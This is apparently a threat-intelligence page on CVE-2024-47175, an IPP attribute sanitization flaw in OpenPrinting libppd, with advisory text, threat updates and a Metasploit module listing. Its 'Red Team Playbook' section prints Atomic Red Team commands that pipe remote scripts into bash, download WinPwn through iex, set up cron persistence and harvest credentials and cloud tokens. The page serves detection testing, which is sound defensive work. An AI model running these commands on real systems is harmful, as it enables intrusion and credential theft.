CVE-2024-47175
Overview
This vulnerability is a failure to properly sanitize input within the libppd component of the OpenPrinting system, specifically in the ppdCreatePPDFromIPP2 function. The root cause is inadequate validation of IPP attributes when generating the PPD buffer, allowing user-controlled data to be processed unsafely. The affected feature is legacy PPD file support in libppd, which interacts with IPP attributes and printer attribute retrieval functions.
Vulnerability Description
CUPS is a standards-based, open-source printing system, and `libppd` can be used for legacy PPD file support. The `libppd` function `ppdCreatePPDFromIPP2` does not sanitize IPP attributes when creating the PPD buffer. When used in combination with other functions such as `cfGetPrinterAttributes5`, can result in user controlled input and ultimately code execution via Foomatic. This vulnerability can be part of an exploit chain leading to remote code execution (RCE), as described in CVE-2024-47176.
Impact
An attacker with network access can supply crafted IPP attributes to the vulnerable libppd functions without requiring authentication or user interaction, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). Successful exploitation enables code execution within the context of the printing system, potentially allowing remote compromise of the host. This can lead to unauthorized control over the affected system, data manipulation, or lateral movement within a network environment.
Solution
Users should apply the security updates provided by OpenPrinting as detailed in advisory GHSA-7xfx-47qg-grp6, which addresses this vulnerability in libppd. Specifically, upgrading to the patched libppd versions that sanitize IPP attributes correctly is recommended. Debian users should update to the fixed package version available in Debian Linux 11.0 or later. Refer to the OpenPrinting GitHub security advisories for exact patch versions and installation instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source printing system CUPS, specifically within the `libppd` library, arises from inadequate sanitization of Internet Printing Protocol (IPP) attributes during the creation of Printer Description Files (PPD). The function `ppdCreatePPDFromIPP2` fails to properly validate user-controlled input, allowing malicious actors to manipulate the attributes passed to it. This oversight can lead to the construction of a PPD buffer that contains arbitrary code, which may be executed when the PPD is processed by the printing system. The combination of this flaw with other functions, such as `cfGetPrinterAttributes5`, creates a pathway for attackers to exploit the system, potentially culminating in remote code execution.
Attack vectors leveraging this vulnerability are particularly concerning due to the nature of the printing system's integration within various environments. An attacker could craft a malicious IPP request that includes specially formatted attributes, which, when processed, would lead to the execution of arbitrary code on the server hosting the printing service. This exploitation could occur through various means, such as network-based attacks where the attacker sends malformed requests to a vulnerable printer server. Additionally, if the printing system is exposed to the internet or an internal network with insufficient segmentation, the risk of exploitation increases significantly, allowing attackers to gain control over the affected system.
The real-world impact of this vulnerability is profound, particularly for organizations that rely heavily on printing services for daily operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, or even complete system compromise. The business risks associated with such an incident include potential data breaches, loss of intellectual property, and significant reputational damage. Furthermore, the financial implications of remediation efforts, legal liabilities, and regulatory fines could be substantial, especially for organizations in regulated industries such as healthcare and finance.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the CUPS and `libppd` components to the latest versions is crucial, as patches are likely to be released to address this issue. Additionally, employing network segmentation can help limit exposure to the printing services, reducing the attack surface. Monitoring network traffic for unusual patterns, particularly around IPP requests, can also aid in early detection of potential exploitation attempts. Furthermore, organizations should consider implementing strict access controls and authentication mechanisms to ensure that only authorized users can interact with the printing system.
In conclusion, the vulnerability within the CUPS printing system poses a significant threat to the integrity and security of affected environments. Its potential for exploitation through remote code execution highlights the need for proactive security measures and vigilant monitoring. Organizations must prioritize the identification and remediation of such vulnerabilities to safeguard their systems against increasingly sophisticated cyber threats. By adopting comprehensive security strategies, businesses can mitigate risks and protect their critical assets from exploitation.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-47175, with new exploit attempts emerging in the wild. Although the EPSS score has slightly decreased, the vulnerability remains critically relevant due to its integration in active exploit frameworks such as Metasploit, which facilitates remote code execution via malicious printer advertisements on local networks. This shift indicates that threat actors are increasingly leveraging user interaction vectors within LAN environments to exploit this flaw, bypassing traditional network exposure constraints. For defenders, this evolution underscores the urgency of heightened monitoring for anomalous printing traffic and reinforces the necessity to scrutinize internal network behaviors, as exploitation no longer depends on externally accessible services. Consequently, the threat level associated with this vulnerability should be considered elevated, reflecting its growing operationalization and the expanding attack surface within enterprise printing infrastructures.
Update 2 — August 16, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-47175, with telemetry indicating a substantial rise in detection frequency across diverse network environments. This surge correlates with an incremental increase in the EPSS score, reflecting growing confidence in the exploitability of this vulnerability. Notably, new proof-of-concept exploits have been integrated into widely used penetration testing frameworks, which lowers the barrier for adversaries to operationalize attacks within local area networks. The evolving exploit landscape demonstrates that threat actors are increasingly leveraging user interaction vectors to bypass traditional network perimeter defenses, exploiting the ubiquity of CUPS in Linux-based systems. For defenders, this heightened activity signals an urgent need to prioritize internal monitoring of printing-related traffic and user behavior analytics, as the risk of remote code execution via malicious print jobs is becoming more imminent. Consequently, the threat level associated with CVE-2024-47175 should be reassessed as elevated, given the accelerated weaponization and expanding attack surface within enterprise printing infrastructures.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Openprinting | Libppd | All |
cpe:2.3:a:openprinting:libppd:*:*:*:*:*:*:*:*
|
|
|
Openprinting | Libppd | 2.1 |
cpe:2.3:a:openprinting:libppd:2.1:beta1*:*:*:*:*:*:*
|
|
|
Debian | Debian Linux | 11.0 |
cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
CUPS IPP Attributes LAN Remote Code Execution
exploits/multi/misc/cups_ipp_remote_code_execution
|
Simone Margaritelli, Rick de Jager, s ipp-server +2 | Unknown | - | View |
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.